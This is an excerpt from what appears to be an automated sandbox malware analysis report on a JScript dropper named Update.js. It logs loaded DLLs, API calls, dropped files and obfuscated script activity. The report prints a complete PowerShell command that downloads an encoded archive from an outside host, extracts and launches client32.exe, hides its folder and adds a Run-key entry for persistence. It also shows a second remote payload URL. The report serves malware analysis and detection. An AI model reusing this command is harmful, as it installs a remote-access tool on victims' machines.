                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcicl32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: secur32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: shfolder.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcichek.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: pcicapi.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: version.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: winmm.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: oleacc.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msvcr100.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: wtsapi32.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: nsmtrace.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: nslsp.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: devobj.dllJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile written: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\NSM.iniJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeFile opened: C:\Windows\SysWOW64\riched32.dllJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                Source: Update.jsStatic file information: File size 2698311 > 1048576
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe
                                Source: Binary string: E:\nsmsrc\nsm\1200\1200\client32\Release\client32.pdb source: client32.exe, 0000000B.00000002.3445824799.00000000003A2000.00000002.00000001.01000000.00000006.sdmp

                                Data Obfuscation

                                barindex
                                JScript performs obfuscated calls to suspicious functions
                                Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.CreateObject(qqq)}ITextStream.WriteLine(" exit:270473 f:parseInt r:501988");ITextStream.WriteLine(" entry:270487 f:_0x389d1d a0:459");ITextStream.WriteLine(" exit:270487 f:_0x389d1d r:%225COfPcB%22");ITextStream.WriteLine(" entry:270484 f:parseInt a0:%225COfPcB%22");ITextStream.WriteLine(" exit:270484 f:parseInt r:5");ITextStream.WriteLine(" entry:270498 f:_0x389d1d a0:462");ITextStream.WriteLine(" exit:270498 f:_0x389d1d r:%22885012SRCYSd%22");ITextStream.WriteLine(" entry:270495 f:parseInt a0:%22885012SRCYSd%22");ITextStream.WriteLine(" exit:270495 f:parseInt r:885012");ITextStream.WriteLine(" entry:270509 f:_0x389d1d a0:454");ITextStream.WriteLine(" exit:270509 f:_0x389d1d r:%222518607vmSqGw%22");ITextStream.WriteLine(" entry:270506 f:parseInt a0:%222518607vmSqGw%22");ITextStream.WriteLine(" exit:270506 f:parseInt r:2518607");ITextStream.WriteLine(" entry:270520 f:_0x389d1d a0:457");ITextStream.WriteLine(" exit:270520 f:_0x389d1d r:%228BsUHVp%22");ITextStream.WriteLine(" entry:270517 f:parseInt a0:%228BsUHVp%22");ITextStream.WriteLine(" exit:270517 f:parseInt r:8");ITextStream.WriteLine(" entry:270531 f:_0x389d1d a0:455");ITextStream.WriteLine(" exit:270531 f:_0x389d1d r:%22405Gvcfvd%22");ITextStream.WriteLine(" entry:270528 f:parseInt a0:%22405Gvcfvd%22");ITextStream.WriteLine(" exit:270528 f:parseInt r:405");ITextStream.WriteLine(" entry:270542 f:_0x389d1d a0:458");ITextStream.WriteLine(" exit:270542 f:_0x389d1d r:%2247870QkkIHq%22");ITextStream.WriteLine(" entry:270539 f:parseInt a0:%2247870QkkIHq%22");ITextStream.WriteLine(" exit:270539 f:parseInt r:47870");ITextStream.WriteLine(" entry:270552 f:_0x389d1d a0:465");ITextStream.WriteLine(" exit:270552 f:_0x389d1d r:%22418iDeVYT%22");ITextStream.WriteLine(" entry:270549 f:parseInt a0:%22418iDeVYT%22");ITextStream.WriteLine(" exit:270549 f:parseInt r:418");ITextStream.WriteLine(" entry:270563 f:_0x389d1d a0:470");ITextStream.WriteLine(" exit:270563 f:_0x389d1d r:%22377964dSLjeI%22");ITextStream.WriteLine(" entry:270560 f:parseInt a0:%22377964dSLjeI%22");ITextStream.WriteLine(" exit:270560 f:parseInt r:377964");ITextStream.WriteLine(" exit:270413 f: r:undefined");ITextStream.WriteLine(" entry:270674 f:_0x19514d a0:453");ITextStream.WriteLine(" exit:270674 f:_0x19514d r:%22https%3A%2F%2Fmoneymoj.com%2Fcdn-vs%2Fupdate.php%3F88%22");ITextStream.WriteLine(" entry:270671 f:dsd a0:%22https%3A%2F%2Fmoneymoj.com%2Fcdn-vs%2Fupdate.php%3F88%22");ITextStream.WriteLine(" exec:270609 f:dsd");ITextStream.WriteLine(" entry:270618 f:Function a0:%22qqq%22 a1:%22return%20WScript.CreateObject(qqq)%22");ITextStream.WriteLine(" exit:270618 f:Function r:function%20anonymous(qqq)");ITextStream.WriteLine(" entry:270628 f:_0x520536 a0:463");ITextStream.WriteLine(" exit:270628 f:_0x520536 r:%22MSXML2.ServerXMLHTTP.6.0%22");ITextStream.WriteLine(" entry:270625 f:aa a0:%22MSXML2.ServerXMLHTTP.6.0%22");IHost.CreateObject("MSXML2.ServerXMLHTTP.6.0");IServerXMLHTTPRequest2._00000000();ITextStream.WriteLine(" exit:270
                                Found suspicious powershell code related to unpacking or dynamic code loading
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Containe
                                Suspicious powershell command line found
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;
                                Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $BZEEOUWZGC='https://ipva2024-detransp.com/data.php?6891';$UDSKJ=(New-Object System.Net.WebClient).DownloadString($BZEEOUWZGC);$ONPFCAS=[System.Convert]::FromBase64String($UDSKJ);$asd = Get-Random -Minimum -5 -Maximum 12; $UNOVQZWFVD=[System.Environment]::GetFolderPath('ApplicationData')+'\XOQEKRYWQK'+$asd;if (!(Test-Path $UNOVQZWFVD -PathType Container)) { New-Item -Path $UNOVQZWFVD -ItemType Directory };$p=Join-Path $UNOVQZWFVD 'CXCC.zip';[System.IO.File]::WriteAllBytes($p,$ONPFCAS);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$UNOVQZWFVD)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $UNOVQZWFVD 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $UNOVQZWFVD -Force; $fd.attributes='Hidden';$s=$UNOVQZWFVD+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='CJYJHX';$ASDASD='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $ASDASD;Jump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029BB0
                                Source: PCICL32.DLL.6.drStatic PE information: section name: .hhshare
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD33FD0972 push E95AC8D0h; ret 6_2_00007FFD33FD09C9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD33FD09CA push E85D9E5Dh; ret 6_2_00007FFD33FD09F9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_00007FFD340A45ED push ds; ret 6_2_00007FFD340A45EE
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1116FF15 push ecx; ret 11_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1116AE09 push ecx; ret 11_2_1116AE1C
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA26BBF push ecx; ret 11_2_6FA26BD2
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1116FF15 push ecx; ret 13_2_1116FF28
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1116AE09 push ecx; ret 13_2_1116AE1C
                                Source: msvcr100.dll.6.drStatic PE information: section name: .text entropy: 6.909044922675825
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\msvcr100.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\HTCTL32.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\PCICHEK.DLLJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\remcmdstub.exeJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\pcicapi.dllJump to dropped file
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\TCCTL32.DLLJump to dropped file
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_6FA07030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod,11_2_6FA07030
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11128B10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,11_2_11128B10
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CJYJHXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run CJYJHXJump to behavior
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11139ED0 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary,11_2_11139ED0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,11_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11113380 IsIconic,GetTickCount,11_2_11113380
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,11_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,11_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,11_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,11_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,11_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_1115BEE0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,11_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,11_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11024880 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,11_2_11024880
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110C1020 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId,13_2_110C1020
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11113380 IsIconic,GetTickCount,13_2_11113380
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110CB750 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos,13_2_110CB750
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,13_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_111236E0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,13_2_111236E0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11025A90 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer,13_2_11025A90
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1115BAE0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop,13_2_1115BAE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11113FA0 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt,13_2_11113FA0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11025EE0 IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11025EE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_1115BEE0 SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows,13_2_1115BEE0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_110241A0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer,13_2_110241A0
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 13_2_11024880 _strncpy,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId,13_2_11024880
                                Source: C:\Users\user\AppData\Roaming\XOQEKRYWQK-5\client32.exeCode function: 11_2_11029BB0 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary,11_2_11029BB0
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
